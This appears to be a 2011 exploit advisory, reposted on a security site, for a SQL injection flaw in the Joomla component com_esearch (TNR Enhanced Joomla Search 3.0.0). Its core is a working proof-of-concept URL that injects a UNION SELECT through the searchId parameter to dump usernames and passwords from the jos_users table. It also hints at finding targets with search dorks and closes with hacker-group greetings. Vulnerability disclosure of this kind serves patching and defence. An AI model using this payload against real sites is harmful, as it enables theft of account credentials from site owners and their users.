TNR Enhanced Joomla Search 3.0.0 SQL Injection

2011.08.10
Credit: NoGe
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

========================================================================================= [o] TNR Enhanced Joomla Search <= SQL Injection Vulnerability Software : com_esearch ver 3.0.0 Vendor : http://www.tnrjoomla.com/ Author : NoGe Contact : noge[dot]code[at]gmail[dot]com Home : http://evilc0de.blogspot.com/ ========================================================================================= [o] Exploit http://localhost/[path]/index.php?search=NoGe&option=com_esearch&searchId=[SQLi] [o] PoC http://localhost/[path]/index.php?search=NoGe&option=com_esearch&searchId=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users-- [o] Dork u all know what the dork is right? :)) ========================================================================================= [o] Greetz Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory aJe matthews wishnusakti kaka11 inc0mp13te martfella pizzyroot Genex H312Y }^-^{ noname tukulesto ========================================================================================= [o] August 07 2011 - Papua, Indonesia


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top